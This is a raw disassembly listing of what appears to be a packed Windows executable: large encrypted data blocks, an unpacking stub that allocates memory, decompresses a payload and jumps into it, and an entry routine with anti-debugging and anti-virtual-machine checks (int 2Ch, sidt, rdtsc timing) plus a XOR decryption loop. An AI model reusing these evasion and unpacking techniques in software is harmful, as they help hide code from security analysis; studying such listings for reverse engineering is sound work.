dd 0F985C17Eh, 81A5F302h, 0D2E183D6h, 9C6C78EAh, 7B2BFA7Fh
dd 0E8E81C04h, 2B5D6909h, 200494EBh, 98C11634h, 30772BF7h
dd 0C748FED5h, 0C757584Ah, 5D525614h, 235A84A5h, 913451A7h
dd 0B7241689h, 42B0654h, 5AD0FF56h, 64240CC4h, 673D6F24h
dd 0B1EB2841h, 3A883922h, 90E95FAh, 0EB816B7h, 0F3A75974h
dd 2E0943Bh, 73EE628Ch, 90E49604h, 0B5E68F02h, 31AE1AF4h
dd 0AAE2D443h, 0BFA883BAh, 86885CF1h, 80ADADE2h, 4B28EB24h
dd 3970FFD8h, 75107A46h, 74061604h, 671D272Ch, 76431603h
dd 65C64E5Ch, 3D837E83h, 712148FFh, 51575001h, 5419E853h
dd 22DD86A7h, 0C31074Ch, 6EC9EB14h, 890CE5Eh, 53B07816h
dd 86110EEFh, 0C450417h, 0A3A58389h, 73105CB2h, 0B98C8B25h
dd 0D6F2DCFFh, 0DDBA59D2h, 0FB85477Fh, 14557310h, 2F4D2FAh
dd 6FB0D6FAh, 44F20DCAh, 0C74ACAC4h, 9911A039h, 52498ADFh
dd 0A2A9444Ah, 0F00A28E2h, 22E28125h, 0AC0BEBE3h, 48031ACBh
dd 0C2153953h, 58093F02h, 0B841092Dh, 23087252h, 5A118390h
dd 2920689h, 0C20B0BEAh, 0D79B0E05h, 0DC5AE505h, 5B415D06h
dd 0FF01C8A3h, 8B6000CCh, 8B242474h, 8B28247Ch, 0FC2C2444h
dd 80B2DB33h, 42741839h, 0E802B3A4h, 6Dh, 0C933F673h, 64E8h
dd 331C7300h, 5BE8C0h, 23730000h, 0B04102B3h, 4FE810h
dd 0C0120000h, 3F75F773h, 0E8D4EBAAh, 4Dh, 1075CB2Bh, 42E8h
dd 0AC28EB00h, 4D74E8D1h, 1CEBC913h, 0E0C14891h, 2CE8AC08h
dd 3D000000h, 7D00h, 0FC800A73h, 83067305h, 2777FF8h, 8B954141h
dd 5601B3C5h, 0F02BF78Bh, 0EB5EA4F3h, 75D2028Eh, 46168A05h
dd 33C3D212h, 0EEE841C9h, 13FFFFFFh, 0FFE7E8C9h, 0F272FFFFh
dd 247C2BC3h, 247C8928h, 10C2611Ch, 80B500h, 95E00h, 14700h
dd 865A00h, 800800h, 800C00h, 40000000h, 76CAB800h, 888DF040h
dd 10001082h, 8B014189h, 8B042454h, 2C60C52h, 5C283E9h
dd 4A89CA2Bh, 0C3C033FCh, 4076CAB8h, 58F64F0h, 0
; ---------------------------------------------------------------------------
add esp, 4
push ebp
push ebx
push ecx
push edi
push edx
push esi
lea ebx, [eax+10001043h]
mov edx, [ebx+18h]
mov ebp, eax
push 40h
push 1000h
push dword ptr [ebx+4]
push 0
mov ecx, [ebx+10h]
add ecx, edx
mov eax, [ecx]
call eax
mov edi, eax
push eax
mov esi, [ebx]
mov edx, [ebx+18h]
add esi, edx
mov ecx, [ebx+0Ch]
add ecx, edx
lea eax, [ebp+1000111Dh]
push dword ptr [ebx+4]
pop dword ptr [eax]
push 0
push eax
push edi
push esi
call ecx
pop eax
add eax, [ebx+8]
mov edi, eax
mov edx, [ebx+18h]
mov esi, eax
mov eax, [esi-4]
add eax, 4
sub esi, eax
mov [esi+8], edx
mov ecx, [ebx+10h]
mov [esi+24h], ecx
mov ecx, [ebx+14h]
push ecx
mov [esi+28h], ecx
call edi ; VirtualFree
mov [ebp+10001121h], eax
mov esi, eax
pop ecx
add ecx, [ebx+18h]
push 8000h
push 0
push edi
call dword ptr [ecx]
mov eax, esi
pop esi
pop edx
pop edi
pop ecx
pop ebx
pop ebp
jmp eax
; ---------------------------------------------------------------------------
db 5Eh
dd 9, 82Bh dup(0)
db 2 dup(0)
word_40A89A dw 0 ; DATA XREF: .text:00406750�o
; .text:00406794�o ...
dd 35D9h dup(0)
assume ds:_text
; =============== S U B R O U T I N E =======================================
public start
start proc near
cld
call loc_41802E
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_418006 proc near ; CODE XREF: .rsrc:0041807D�p
push ebx
mov ecx, 0DA5h
mov ebx, edx
loc_41800E: ; CODE XREF: sub_418006+13�j
xor [eax], dx
lea eax, [eax+2]
xchg dl, dh
lea edx, [ebx+edx]
loop loc_41800E
pop ebx
retn
sub_418006 endp
; ---------------------------------------------------------------------------
db 35h, 0E8h
; ---------------------------------------------------------------------------
loc_41801F: ; CODE XREF: .rsrc:00418068�j
pop ebp
retn
; ---------------------------------------------------------------------------
loc_418021: ; CODE XREF: .rsrc:00418036�j
; .rsrc:00418047�j
push ebp
mov eax, 8000h
xor ecx, ecx
jmp short loc_418055
; =============== S U B R O U T I N E =======================================
sub_41802B proc near ; CODE XREF: .rsrc:0041804A�p
; .rsrc:00418050�p
rdtsc
retn
sub_41802B endp
; ---------------------------------------------------------------------------
loc_41802E: ; CODE XREF: start+1�p
test eax, eax
jnz short loc_41803A
int 2Ch ; Internal routine for MSDOS (IRET)
test eax, eax
jns short loc_418021
jmp short loc_418049
; ---------------------------------------------------------------------------
loc_41803A: ; CODE XREF: .rsrc:00418030�j
push eax
sidt fword ptr [esp-2]
pop eax
mov eax, [eax+6]
shl eax, 10h
jns short loc_418021
loc_418049: ; CODE XREF: .rsrc:00418038�j
push ebp
call sub_41802B ; CODE XREF: .rsrc:0041808E�j
xchg eax, ecx
call sub_41802B
loc_418055: ; CODE XREF: .rsrc:00418029�j
sub eax, ecx
mov ebp, [esp+4]
sub dword ptr [esp+4], 156D8h
sub eax, 100h
jnb short loc_41801F
sub ebp, 301006h
lea eax, [ebp+301082h]
mov dx, [eax-65h]
call sub_418006
fsubp st, st
xchg eax, esi
inc edx
ja short loc_418095
mov ebx, 0A8D270D8h ; CODE XREF: .rsrc:004180AE�j
cmpsd
jmp short near ptr loc_41804A+4
; ---------------------------------------------------------------------------
dd 28F0384Fh
; ---------------------------------------------------------------------------
cdq
loc_418095: ; CODE XREF: .rsrc:00418086�j
adc ebp, [ecx+edi*2]
mov esi, 3A7DE4AFh
inc edi
inc edx
mov [edx-43h], ah
push es
stosb
mov dl, [ebx]
db 26h
outs dx, byte ptr fs:[esi]
cmp eax, 13617ED1h
jz short near ptr loc_418088+2
rep fsubp st, st
inc ebp
jge short loc_4180D5
lock pop es
cld
in eax, dx
mov byte ptr [edx+46h], 0EFh
add al, cl
sub eax, 0FC92F72Ch
aam 0AEh
stosd
sub al, [ebp+2F72EA39h]
xchg eax, edx
sbb al, 0FFh
dec ebp
xor [ebx], dh
sahf
loc_4180D5: ; CODE XREF: .rsrc:004180B4�j
in eax, dx
scasd
retf 8E6Ah
; ---------------------------------------------------------------------------
dw 6AB8h
dd 0F3B0E79Fh, 0D081DCF0h, 0AD7DA89Ch, 132FF785h, 749CEA46h
dd 2A43E6B7h, 3788B84Fh, 26E16D6Ch, 14CBEBECh, 0E0B9D1E3h
dd 0F8F985B7h, 4C9F371Fh, 0E703D52Fh, 45110F4h, 4E027A39h
dd 5FC33325h, 3EC4171Dh, 0AE3AC390h, 0BE2F2824h, 9017CAFAh
dd 551CE7E3h, 5BE0AC5h, 5AA7DCDCh, 0CA0D5C0h, 84175D6Ch
dd 624FFF76h, 0DB4F9796h, 9BD9A1CBh, 0C5A352D0h, 0D723DEFBh
dd 0E1C1A98Fh, 465F2A19h, 3C01C280h, 0C2986453h, 589D5835h
dd 3666139Dh, 91F08BAFh, 29B0551Eh, 6F2AC5DEh, 0FF4EFB37h
dd 98393130h, 5967FF0h, 48D56A6Ah, 0FA4288EDh, 8CEA89B9h
dd 0BBB775CEh, 0D2255220h, 60B8FCCCh, 27F0F28h, 0BAEF30DCh
dd 3CB94166h, 74338E71h, 0B7C3BEA2h, 17EFB443h, 0B0FDC81Ch
dd 0A40EA26Eh, 83FB0043h, 563120h, 0E92BBB4h, 16F85B6Ah
dd 35AD7817h, 0D5F6A94h, 1CE7829Dh, 0F080C00Eh, 4221ECEFh
dd 0E23FBF87h, 0E0D62817h, 2C7250FDh, 497AE361h, 0EBB44F6Eh
dd 0B3C0610Eh, 5F4B4AB8h, 9EE75537h, 0D4420F78h, 741FD122h
dd 267E80BBh, 0B82ABF4Bh, 40C9E094h, 3AA7C17Bh, 8BD8A0CAh
dd 46603FBFh, 4612EDF7h, 23AADA3Eh, 2B59C17h, 77FD3535h
dd 52863852h, 0D7A46B6Fh, 75C18CE4h, 704B56A9h, 2BFBF6EDh
dd 179CEC23h, 83360103h, 63C4F1Eh, 4971383Bh, 4C669858h
dd 0DAA1C22h, 7BC892FAh, 76704FAFh, 0DD02FDE7h, 0D31EEAE0h
dd 0DBDC9DF7h, 8B32615h, 0C3784342h, 479562F5h, 87EB7D16h
dd 7EC5F093h, 0AEC0DE23h, 7FF83FD3h, 0F6234C72h, 0F8440F3Fh
dd 1460A0A8h, 3179A249h, 1AD26766h, 6BF5C8C7h, 0A4CB345Fh
dd 107EBE8Dh, 0C320CC64h, 5CA031CBh, 0FE7B3A6Fh, 0F3FA3982h
dd 38865394h, 790AD3EEh, 7DC08BBAh, 8FDFF123h, 0D17F4EC4h
dd 3517D2CDh, 6DBBFE8Fh, 5623624h, 95687BBh, 0C0735767h
dd 0DBA67474h, 79C693ABh, 0BA722B25h, 0C4FFCBFBh, 549867E8h
dd 6E3B362Ch, 3C72A299h, 2989BE41h, 5D14515Eh, 0E8B07B79h
dd 0B0E1191Dh, 9C9A4AB5h, 908A575Dh, 64A5EFC0h, 0F6722683h
dd 1360D4D4h, 3181CF47h, 0C0116565h, 6A87AE07h, 0F62B867Ch
dd 3E7433BDh, 430EE9F2h, 0D0006C4Ah, 0FDB6EB15h, 0C1E03D32h
dd 0DF844F4Eh, 54A16D8Ah, 5D413404h, 4150A696h, 720EC3A9h
dd 4A11901Fh, 0A758FE1Fh, 6E07E21Fh, 0AC755239h, 0E9FC2E3h
dd 5BBBCB73h, 7C498F90h, 6A1E52E0h, 3F55AF35h, 0D01BABE3h
dd 465F0405h, 0A15365AFh, 41D8DB0Dh, 0CF6ABEF7h, 9AE13ADh
dd 7ECBF6C2h, 9B827F38h, 0B96F145Bh, 0D722ED86h, 0A5006104h
dd 4150437Bh, 2F2D3B9h, 0C8C06353h, 3CDDC044h, 0ED29DFDh
dd 29EFD06Eh, 0AA08BD1Bh, 8C2B9EF5h, 0AF2F1279h, 72653050h
dd 0CAE81C4Dh, 0DF0A953Ah, 30BCB7ABh, 832621FDh, 0A9F7FC45h
dd 0C7A653DEh, 5C30CBECh, 24E110Fh, 0BA98D9BCh, 2C88BED5h
dd 0DC287041h, 76F29988h, 6524A54h, 0B0CCDE9Ah, 8F8C1BB7h
dd 337322Fh, 8552036h, 4E1D5271h, 30DF2A2Fh, 33C5011Eh
dd 2AACF3F1h, 0FC93DDD0h, 4853CE8Fh, 0E50B3279h, 2FBB800Ah
dd 5F5C170Ch, 46592E10h, 0DC039E9Eh, 0E3B34E52h, 0BCA5C45Bh
dd 0F6EFD22Eh, 0D4DE5E83h, 0CDCFA0F2h, 0AA451011h, 74066A4Bh
dd 41D02C3Eh, 3CF41E01h, 6DDFE2E0h, 57425DF4h, 2CF48F94h
dd 93478A18h, 1C79AFAAh, 30606E8Dh, 0DADB735h, 0F713AE05h
dd 3DA35E44h, 8BC2E18Ch, 0A1F1AD3Ch, 0AFD27CC6h, 0E780E2E3h
dd 0CD3989E0h, 93AC494Ah, 2340176Ah, 0E50EAE6Bh, 5D9A5998h
dd 8590C692h, 0A7C8FA3Ah, 0C1C149CCh, 2D9DAFB6h, 0FD2750Ch
dd 67520151h, 0D55D2842h, 77B812CAh, 1071F97Ch, 74260A45h
dd 0ADEBB6B2h, 8CEB421Ah, 0F6C875C8h, 0DF360E3Fh, 481EDADh
dd 652E4949h, 1ECA3036h, 0FE47D0D3h, 88E58B5Dh, 0D1AB7D38h
dd 0E77B25D5h, 0CA978F0h, 164A253Ah, 0E497CE5Fh, 0F510AF03h
dd 0BEA25D46h, 5A7B0B12h, 0D8DCA7A6h, 8734513Bh, 5FE9E1D1h
dd 0E803D532h, 0FAABF2F4h, 226E39C5h, 0CD15657h, 0DF922BDh
dd 79C4F8C0h, 5269ADAAh, 0BF959A9Ah, 124E2363h, 0BA4C6050h
dd 0F4B8CB23h, 0BDF8BFBFh, 45A24811h, 32FE2B28h, 541D0268h
dd 586AB484h, 458D12F1h, 0D87BB6B7h, 0F5412C59h, 125F3A88h
dd 2F7C4746h, 4C996464h, 69B68181h, 7980C8CFh, 93DB622Eh
dd 6D5473D8h, 245F3572h, 0A08BFDF6h, 7C155073h, 53EE2F00h
dd 39C2240Fh, 3C9EBEDh, 0EEBFF6F9h, 0D89E94B6h, 0A414AAABh
dd 8543888Eh, 6F4F6E7Ah, 4C1E434Bh, 7E893A30h, 2EC71400h
dd 1BAAC8EAh, 0D7E0EAC9h, 0C59CADBBh, 0A373A383h, 9C594E61h
dd 6E384851h, 54303E7Fh, 26E43A3Eh, 3C20A28h, 3CB9E6F0h
dd 0FF95F1B2h, 0EA61BBAEh, 0A24E8188h, 81575E6Eh, 1039494Dh
dd 4C1F3706h, 22C30716h, 3D51A0Dh, 0E1A3DF9Ch, 0F58BCDD8h
dd 0D767B9B9h, 0EE589F91h, 9B284220h, 780C5C5Fh, 4CC44C38h
dd 39CA1D00h, 0ADAE3F4h, 0FFBDE4A3h, 0CD99A986h, 0B466A99Ch
dd 905A9892h, 10C6B7Ch, 581E5071h, 68E23E3Ah, 58C11519h
dd 33B5E9CAh, 0C6BBC5C3h, 0AF9EABAEh, 806C86A3h, 8643656Dh
dd 6B3D597Ah, 49107259h, 68E183Ch, 31E60213h, 1EA4E6F7h
dd 0FC8BD1F8h, 0B643A8A1h, 876B8FACh, 94497B70h, 7C32624Bh
dd 440C2026h, 48D41912h, 31C6183Ah, 0C4BFF7FFh, 0D189DBDEh
dd 0FC6CB9B5h, 0AF43B6F2h, 88296A44h, 7D164C7Dh, 57384A0Bh
dd 3DF93113h, 2D6EDF7h, 0FDB3E6A1h, 0D581DBE8h, 817EB4B2h
dd 0A52DB981h, 901D6272h, 79044158h, 56E03F18h, 22C2031Ch
dd 32AEE4E2h, 0E4B8EFA8h, 0C994AC92h, 8F64958Dh, 8B507269h
dd 7C217169h, 4D1C7C3Ah, 7EE13935h, 3FC51918h, 18A8DE91h
dd 0F48DE3CAh, 0CD73ADB9h, 0B353E9A8h, 8A555177h, 4A3C6A53h
dd 29122E28h, 28F12F11h, 6DD153Dh, 0F0BEF8D5h, 0DC8CD8DCh
dd 0DE789CD2h, 0B657A09Eh, 85306B6Dh, 7C137C2Bh, 430D2C2Bh
dd 24DD5456h, 6ACCF0F0h, 0E4BAD2CFh, 9781CED9h, 0BA6A94EBh
dd 857EF783h, 940C7174h, 4968565Eh, 5EC3242Ah, 20E30800h
dd 13D6F8FDh, 0FDB9D3D3h, 0CEAAC482h, 0A57FA794h, 8E5CAE9Bh
dd 76346872h, 550B6A39h, 5BE73F10h, 3EC51A27h, 1DA9C390h
dd 0C0E2DDC8h, 0C29EA7A4h, 0A7798EB1h, 847C634Ah, 5C58464Eh
dd 52013256h, 28D3313Dh, 61CC1515h, 0AA5E5C1h, 0F780F2D6h
dd 0CD48D1B5h, 0A2498AAFh, 8611787Fh, 7D365C40h, 5D192023h
dd 2EF20B37h, 1CF881EEh, 0E4B6ECDEh, 0CBB6DECEh, 8E0DBDBBh
dd 0BB58B681h, 0AB2D6772h, 7D055E42h, 7B833D3Eh, 37D2281Eh
dd 3FD8FCE6h, 0E9B9CAD6h, 0D1B2B1B2h, 846091DEh, 9150998Eh
dd 612A497Fh, 71035E43h, 71FD1A54h, 30F00110h, 108CF9EBh
dd 0E783CEF8h, 0B093A7A1h, 0BE5591ABh, 827E6D66h, 4656444Ch
dd 40037149h, 2DE20B34h, 2CDE1D14h, 19A1FAC0h, 0EDA9B2DFh
dd 0D961BF81h, 0A14289BFh, 0F2516563h, 7D0D5C69h, 4F1F312Bh
dd 3BFE3415h, 0AD50A0Ah, 0ECBCF9D6h, 0EEEEC0CAh, 0DB7E87A1h
dd 0A57B8A81h, 94236562h, 79024167h, 47E02139h, 50F00601h
dd 1FECF2CBh, 0DCBDD7CBh, 0D281B2D6h, 0A05FB1BDh, 9A5D9597h
dd 6C394A18h, 7E035B60h, 69E2363Dh, 39CD1D1Bh, 35AED8EBh
dd 0C2B7DAC7h, 0C092B4B2h, 9F4FE384h, 88425240h, 76216B6Ch
dd 4C1D5F3Bh, 2FFD3C2Bh, 29CE1D16h, 14A7F092h, 0E386D5C1h
dd 0C167AACCh, 0A76C8582h
dd 9153716Ah, 7F5B4348h, 2A0E2027h, 23FB052Ch, 7DD0E7Ch
dd 81BBFFF2h, 0FB98D9FFh, 0C86CBAA1h, 0A9499DB2h, 9925476Ah
dd 14074148h, 540B2400h, 3AF90914h, 28CDE1C4h, 0EDB8CFCFh
dd 0C196CADEh, 0B771AF89h, 8F64F89Dh, 90397362h, 6B264056h
dd 38C73F35h, 30D70024h, 6A5E5F8h, 0E1B8D8E8h, 0ED96B791h
dd 0BE79ABE1h, 8D5A8D9Ah, 64374F69h, 4E067C5Eh, 7BCD5732h
dd 15F93522h, 3DE8A3A2h, 0C4E3E2E2h, 0D843ACAEh, 99789B86h
dd 0BD3B7F62h, 7C164341h, 4C3D2F24h, 7EB1B27h, 4D5297Bh
dd 0F2A8EDC9h, 0F18BE3CCh, 0C342B7A7h, 0BC76EFB1h, 82275E69h
dd 660C4A7Dh, 71050D2Dh, 4873E665h, 2E64AA9h, 6FD49F9Fh
dd 0A7D5F031h, 0C764D9B3h, 8A78A6A6h, 0AD859F10h, 4E37E6B9h
dd 65D50F25h, 0C934933Fh, 0F2BEB9A5h, 1B24AA62h, 0ABC8EF66h
dd 0A1D2463h, 4EB770A9h, 37502B09h, 210768C6h, 0AB755B3Ch
dd 5B975E3Ah, 0FCCB4F15h, 95E1AC3Dh, 0D2AAA19Ah, 490E6E7h
dd 21B2046Fh, 0A3F6248h, 4D742F3Fh, 44FB0E5Eh, 61CE2D11h
dd 2FCBFC96h, 0E17E3E0h, 0B935FC5Dh, 42DDB4B1h, 0F47020C1h
dd 4D2AD6ACh, 3BFBCBCDh, 477B6353h, 78B5150Dh, 54D19DADh
dd 7010E9EDh, 0EC71525Ch, 51A4F4C5h, 0FB47092Bh, 0E79A64D8h
dd 0A407C6B2h, 0DF9F5A46h, 6FA70208h, 739A4CA4h, 2C7D3E3Eh
dd 0C723F25Fh, 0FEBC7471h, 30A6191Ah, 9494C9C8h, 0CA4D6D1h
dd 2D65F571h, 0EF4D0085h, 7BDFAAB0h, 4F0338D5h, 0D46236Eh
dd 0EB37EA56h, 89082020h, 1568BBD0h, 0CF46695Ah, 6F8C97F2h
dd 2D9DC594h, 0C8B7E1E0h, 9B025B31h, 0D1A7EBDCh, 3FABF62Eh
dd 525C170Ch, 79794086h, 49966189h, 8B32237Eh, 83E0812Eh
dd 356047D2h, 0BE3ACF55h, 0FCEAA0A3h, 0F96F1035h, 706FEAADh
dd 2946CE8Ch, 70506858h, 77720042h, 8AF3A292h, 64A9BF95h
dd 0C47BDDB6h, 90D1CA05h, 8559E81Ch, 759940F5h, 3A865159h
dd 54F8BEE4h, 0C14DB7DCh, 91EDB24Dh, 0AFF67F4Dh, 469CE2E3h
dd 0E9350109h, 0CD78E61Dh, 0D0BBB05Bh, 45F939FEh, 0B65F9732h
dd 75001150h, 0C43024F8h, 0E1510047h, 814FA980h, 65C3F862h
dd 0D6A09B8h, 0A17B86C1h, 77B856CAh, 0E766577Ch, 86099E73h
dd 9E03B6DCh, 7F0B845Ah, 0F6D26598h, 73460E3Fh, 0D4522424h
dd 0B864F90Bh, 7EB791F3h, 0E65A7483h, 767FC1E2h, 6613C874h
dd 0C30F328Fh, 6071F7F8h, 0CE5163FBh, 0E0F5B833h, 0BB85607Ch
dd 55AA4911h, 72060E85h, 635DA7A7h, 0ACF9C6CCh, 0CB1289B5h
dd 7DCCFEFFh, 5613034h, 0A6E3C5B1h, 3F8A5273h, 5CC22374h
dd 79C59479h, 0C2B0FBAEh, 26009DCBh, 0D12CCBCDh, 79B7CC35h
dd 0B582227h, 2A1F1111h, 2D93370Ch, 22AF7A7Ah, 8E5968C5h
dd 0AE9849Fh, 0E1722754h, 0DC4BBABFh, 0A2410C0Ch, 327B9ED5h
dd 0D07C4745h, 7CB5BDF1h, 0A933D881h, 923088EAh, 0C92430EBh
dd 965C8AD8h, 0AABF0AA0h, 0A5482338h, 0C913F1B4h, 0FB16B118h
dd 0DEA05B40h, 27EFCCDFh, 82E1CFh, 0AAF6C655h, 82774DFh
dd 1568EC97h, 531F4AB0h, 703C6768h, 0C41CAB07h, 0DBA64159h
dd 77C1864Bh, 0B09454ACh, 786837C1h, 9C1AD5CAh, 0C0F196FBh
dd 0CB0B2111h, 18F33E3Ah, 5912E51h, 75D1F5F3h, 642995A5h
dd 8AE7273Fh, 6907CFFFh, 52F313BBh, 0CB705CBh, 1F5D2828h
dd 2D7AB5C1h, 70A9E262h, 0E7F26F0Ah, 0DE9CA2h, 0A1EEB958h
dd 0CA2BE856h, 0E3A9B505h, 0BD085842h, 0D8EF0D5Ah, 7B800A8Ah
dd 3BCFA742h, 3DEDD786h, 0A719365Ch, 93ACC0F0h, 7997D21Ch
dd 0D2FFAFBh, 14D18A8h, 4C3A0BB7h, 0BE88041Ah, 58A46FD5h
dd 0D9C94A0Eh, 16D1A496h, 0AFFBC65Eh, 3E6DC3D8h, 0E50C3DAEh
dd 754939Ah, 47C913Ch, 7CAE7979h, 2ACE1157h, 4764ECE6h
dd 1999C590h, 0DE2232B3h, 0A56A9E9Fh, 813E7688h, 7B74091Ch
dd 0D43F852Bh, 0F2A46F60h, 65B25A6Dh, 7D9D786Dh, 0AFC0DE22h
dd 0EDC9E7D4h, 3376A1A2h, 0F8440F19h, 7B154269h, 561E2526h
dd 9E099867h, 0E9B9B4A8h, 0BAE0D561h, 5D763777h, 9510EBF7h
dd 0E22EF891h, 0A91A4793h, 0C9FCCB64h, 0B486617Dh, 66B81EFBh
dd 0BAF3DB8Bh, 0C28DF9FCh, 38059494h, 0CB27CEE3h, 17110487h
dd 3578D388h, 0A2B3C33Ah, 0F9837DAh, 9F537474h, 7DE3CE1Ah
dd 96E4AF46h, 598091CBh, 0D22EF494h, 0DF7FBA8Ch, 0B9D12514h
dd 2947720Ah, 0CB1FA45Dh, 63814C3Ch, 5453C6Bh, 9DDB86F6h
dd 8B374659h, 5C26F0C0h, 0F6733E39h, 9B092EA2h, 0CF7E495Bh
dd 7DB70FF0h, 36716882h, 0EEA3C5DBh, 0F4AED8DFh, 0AB7CA3B1h
dd 0AD409694h, 8F257870h, 0C85B334Bh, 0C1D79FC4h, 0B5213FB5h
dd 72FFE08Ah, 0E48EF05Fh, 104C49DBh, 7016D1FDh, 0E733FEE9h
dd 0FA1C1891h, 4791C6C6h, 738FDBFDh, 5BA87373h, 3F483BF6h
dd 71D006A9h, 5054AC66h, 0E3896A1Ch, 0B93A3535h, 0F50A2548h
dd 1759D9AAh, 60E6D65Ch, 796BF971h, 0FBC35713h, 9BE9B516h
dd 996ED1BAh, 8123EEEFh, 61BE0766h, 116F0688h, 0A57019CDh
dd 0D610742Dh, 6886B1B7h, 0B5E81314h, 4171BB8Ah, 0CFF228D7h
dd 0DE40A6A4h, 4EB71579h, 18560103h, 19C6DBB2h, 0ADF06B5Ah
dd 5F8DBB32h, 414F5AA4h, 0F1F7F2EAh, 0C8871F5Bh, 0E530A878h
dd 39CE7C1Ah, 13186D7Ah, 511CAB07h, 0B0A6415Dh, 76C38FCFh
dd 93281526h, 7F2C8C8h, 0BA97FBABh, 0EF501C32h, 5F562121h
dd 952ABC2h, 15C65B6Ah, 7444ED88h, 3F4195A4h, 1224B18Dh
dd 6407B79Eh, 5E019E67h, 0C6B21240h, 0CF07914h, 2D02C487h
dd 3BF23104h, 94567A0Ah, 0AA7C77C2h, 0D2659DB4h, 4D088FF1h
dd 0D334A178h, 0FA0815A6h, 9450A4FDh, 7D0ABF48h, 6F2BE060h
dd 0E6BBB6B5h, 0BD6D9894h, 0D5F5F08Fh, 0F2A7F65Fh, 0D82FCACAh
dd 307D23ADh, 6CE93A35h, 978ADADh, 1411E6AFh, 0FDC1BCBCh
dd 0A1EEEE24h, 0C4AB96C6h, 0CD72B3E0h, 0E9360169h, 83AB489Eh
dd 23412943h, 6B7FCCA7h, 0D0547645h, 7AF886EAh, 981A482Ch
dd 4AFDF648h, 0E09A6315h, 9A3D3838h, 5B5B4C25h, 4BEDBC12h
dd 0CC955073h, 54823AF9h, 832F5B99h, 9E86E7E6h, 9034412Ch
dd 5FAFF1C1h, 0F7743F44h, 1408F9A7h, 614DB51Bh, 7EAFD299h
dd 0FE4684B3h, 88E68DF9h, 95C03B36h, 0C799DBEAh, 2CB807DCh
dd 754B263Dh, 0AEE20860h, 38B6611Bh, 61B93AE6h, 0E7EB7501h
dd 8FED9890h, 9CBD484Fh, 0E1BAE2D1h, 12D6543Dh, 18269890h
dd 733E3A0Ah, 6EDD0704h, 70A8E18Bh, 869691A1h, 0A6C8633Bh
dd 0C72508CBh, 0B727C2D3h, 83596769h, 4C634041h, 45132932h
dd 68A16D32h, 4FDC171Fh, 0D3CDA9B5h, 0D8BEE6ECh, 0CE448E9Fh
dd 0B7419D82h, 982D4E7Ah, 7F0F595Fh, 6C092D1Bh, 3BE80036h
dd 19D2E1EBh, 0E6BCCCC3h, 0E595D9CEh, 0B16BBABAh, 817BAA84h
dd 98247567h, 69155746h, 45ED0913h, 38C01B09h, 1DD1D9E5h
dd 0D2A2C5CFh, 0C599B790h, 0AD678184h, 815D8FAEh, 58357775h
dd 49194D78h, 44E32739h, 2BE61616h, 1BADE3E0h, 0FA88D8CCh
dd 0FEA2BAA4h, 0D06F958Eh, 0B97F4B56h, 4F056375h, 441D7263h
dd 2BE2332Eh, 36F20D1Fh, 11AFF8FFh, 0D8B4C0C4h, 0DC77A2A5h
dd 0B2749980h, 9B29787Eh, 691B7547h, 5C142A36h, 1F981106h
dd 0DD2F2E1h, 0F6BDD5E9h, 0A2EDBACEh, 845F87D7h, 0AC59EAE5h
dd 962E6A7Ch, 73115E1Eh, 45EE233Fh, 3CF6440Bh, 21BCE8E1h
dd 0AC92E7EDh, 0DA85A9ACh, 0AE74BFA4h, 0A063AEF6h, 48373948h
dd 3F257F78h, 4EE12572h
dd 53960505h, 76C265DBh, 1282AAABh, 80DC2125h, 0A19C22E5h
dd 0EB373216h, 2478B5DFh, 0CDB33D0Dh, 28DE2E45h, 0BE19FC69h
dd 25C9A4BFh, 0ECC88D1Dh, 8982A8E4h, 0F655F613h, 0DECFB487h
dd 79D72717h, 4ADC1346h, 4713ECC4h, 0E9B34E55h, 0B3FBAF1Eh
dd 0E66442B8h, 4044592Fh, 3E264308h, 6F09DDEh, 7E631E02h
dd 33804A4Fh, 6908973Eh, 84BAB5A9h, 8AD7A22Bh, 0B25D3A32h
dd 0AF41DCECh, 1C2093FAh, 30605E8Dh, 3915B735h, 4BF3555Ah
dd 57A36687h, 3786D88Ch, 0DD91EC87h, 0B36F3AC6h, 0C717D2CFh
dd 832174C1h, 6EBB4E1Ch, 0DC8FC4C2h, 70A681CDh, 296AF075h
dd 92176D90h, 97E4AFA4h, 0EA428A9Fh, 9730BAA5h, 0F3C4B44h
dd 3D7638B0h, 0D336AA42h, 0F219A0A0h, 64815083h, 81CF9DF1h
dd 0B14E0B6h, 0BC38FFF2h, 0DA25FD19h, 0A507520Fh, 46247A65h
dd 653B151Ah, 0B1CD6625h, 5B936A16h, 88D248A0h, 0EDAEBDBDh
dd 905B8995h, 74D3A1F8h, 0FE7A3EFFh, 4A39FA00h, 52D4533Ah
dd 55A2056Ch, 8DE9CA8Ah, 0BFF75632h, 530147C4h, 4746C295h
dd 0D81F016Ah, 9EDC911Dh, 486E091Dh, 25E30457h, 0DA87374h
dd 0C506FC1h, 69E29D82h, 83D4075Eh, 0D1170FE8h, 0BD6F0506h
dd 396B7166h, 6439046Eh, 407A25Dh, 8AAF4A56h, 7FCC979Dh
dd 0EE99C7C3h, 0DC72BFB8h, 2773EEAEh, 0C56AD598h, 0F7DAA32Ah
dd 207C776Ch, 1E14E955h, 0E0B6B198h, 0B6FF691Bh, 360FEABBh
dd 0C13DF499h, 0DF2E9D65h, 49C51314h, 1956286Eh, 0EB3EC317h
dd 0BBA05B47h, 8F427A74h, 295F62C3h, 0AAF7F2E2h, 6EB15C8Fh
dd 0E631CCDDh, 232B8F96h, 743C3708h, 3DE3553Fh, 5AA41920h
dd 0E23C0E8Fh, 94D0874Dh, 0C4A7084Ch, 589768C4h, 0BE383324h
dd 0BCDB274Bh, 26431E9Ah, 13C00D0Fh, 0F5522A29h, 7DFAB970h
dd 47724DEAh, 7E04FFE3h, 0E60F1268h, 9DD70A0Bh, 0EFA2D7DAh
dd 1D6838C8h, 612A562h, 31B44F6Ah, 6CE2C3C8h, 5E114BE0h
dd 0AA475311h, 897EF3C4h, 0B0AE254Dh, 0D09BD0DDh, 49400C9h
dd 0EE63F69h, 9C806EB2h, 0E1F5C5Ch, 0A8C5D58Ch, 9264B88Bh
dd 61A233C8h, 17D2856h, 4F3B6467h, 6AD60303h, 7491FA8Fh
dd 0E03E8CBDh, 92EE8587h, 0DAE42E06h, 0CD140B90h, 0A2650102h
dd 57154853h, 68351275h, 0D4715915h, 5E9B5A37h, 7BC89F7Bh
dd 0CBADE3B0h, 0D754B9A8h, 957A9F87h, 64C25809h, 0E6B0DFFh
dd 0D4CDCED0h, 2095504Ch, 65B27DB5h, 7DCFF0CCh, 0AFC0AE22h
dd 6F9C59D4h, 5626C1EDh, 0C869C8ADh, 42307B2Dh, 199ADFB5h
